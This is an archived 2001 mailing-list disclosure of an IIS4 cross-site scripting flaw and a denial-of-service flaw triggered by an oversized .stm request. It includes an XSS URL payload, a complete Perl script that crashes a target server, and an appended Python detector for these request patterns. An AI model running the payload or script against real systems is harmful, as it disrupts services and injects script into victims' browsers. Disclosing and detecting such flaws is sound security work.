Vulnerability Development mailing list archives
New D.O.S on IIS4 & a new cross site scripting vuln
From: "Admin [iSecureLabs]" <admin () ISECURELABS COM>
Date: Thu, 29 Mar 2001 16:55:08 +0200
--[ iSecureLabs.com French Security Team ]--

We have found 2 vulnerabilities on Microsoft IIS4
- Cross Site Scripting
- D.O.S

--[ The first one:

It is a cross site scripting. Using this crafted URL
http://server.com/foo/<script>alert('test')</script>.stm
it will execute the JavaScript code on your computer.

--[ The second one:

By requesting several times a .stm file 500 chars long
(http://server.com/foo/[a x 500].stm) the IIS4 server crashes.
Perhaps it is possible to use this vulnerability to execute arbitrary code.
We are currently working on a way to exploit this vulnerability.
If someone wants to help us, it is ok ;-)

Here is the exploit for the D.O.S one:

---<cut>---
#!/usr/bin/perl
# IIS4 .STM D.O.S by aurelien.cabezon () iSecureLabs com - http://www.iSecureLabs.com

use IO::Socket;

if (@ARGV <2){print "Usage: ./stm.pl <host> <port>\n"; exit;}

$overflow = "a" x 500;

sub connect() {
    $Socket= IO::Socket::INET->new(Proto=>"TCP",
                                   PeerAddr=>$ARGV[0],
                                   PeerPort=>"$ARGV[1]",)
        or die "Connection impossible a $ARGV[0] : f$!\n";
    $Socket -> autoflush(1);
    print $Socket "GET /foo/$overflow.stm HTTP/1.0\n\n";
    print " \n\n> GET $ARGV[0]/foo/$overflow.stm HTTP/1.0\n\n";
    print " > Server response:\n\n";
    # Read each response line once (the original loop discarded every other line)
    while($reponse = <$Socket>){
        chomp ($reponse);
        print "$reponse\n";
    }
    print "\n> Data Sent. Server crashed.\n";
    close $Socket;
}

&connect;
---<cut>---

Cabezon Aurélien
aurelien.cabezon () iSecureLabs com
http://www.iSecureLabs.com
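Added example, not part of the original post: a log check a defender could run to spot the two request patterns described above (markup in a .stm path, and repeated requests for an oversized .stm name). The NCSA common log format input, the 255-character threshold, and the names `classify` and `scan` are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Assumed threshold: the post reports crashes with a 500-character name, so any
# .stm path segment far beyond normal file-name length is flagged.
MAX_SEGMENT = 255
LINE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']")

def classify(target):
    """Return findings for one request target; an empty set means nothing matched."""
    path = target.split("?", 1)[0]
    # Decode twice so double-encoded markup (%253C) is seen as well.
    path = unquote(unquote(path))
    findings = set()
    if not path.lower().endswith(".stm"):
        return findings
    if MARKUP.search(path):
        findings.add("markup-in-stm-path")
    if max(len(seg) for seg in path.split("/")) > MAX_SEGMENT:
        findings.add("oversized-stm-name")
    return findings

def scan(lines):
    """Count findings per client so repeated oversized requests stand out."""
    hits = defaultdict(Counter)
    for line in lines:
        m = LINE.match(line)
        if m:
            for finding in classify(m.group("target")):
                hits[m.group("client")][finding] += 1
    return {client: dict(counts) for client, counts in hits.items()}

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [29/Mar/2001:16:55:08 +0200] "GET /foo/index.stm HTTP/1.0" 200 512',
    '192.0.2.11 - - [29/Mar/2001:16:55:09 +0200] "GET /foo/%3Cscript%3Ealert(1)%3C/script%3E.stm HTTP/1.0" 200 0',
    '192.0.2.12 - - [29/Mar/2001:16:55:10 +0200] "GET /foo/' + "a" * 500 + '.stm HTTP/1.0" 200 0',
    '192.0.2.12 - - [29/Mar/2001:16:55:11 +0200] "GET /foo/' + "a" * 500 + '.stm HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE).items():
        print(client, findings)
```

A per-client count above one for `oversized-stm-name` corresponds to the "requesting several times" condition in the post.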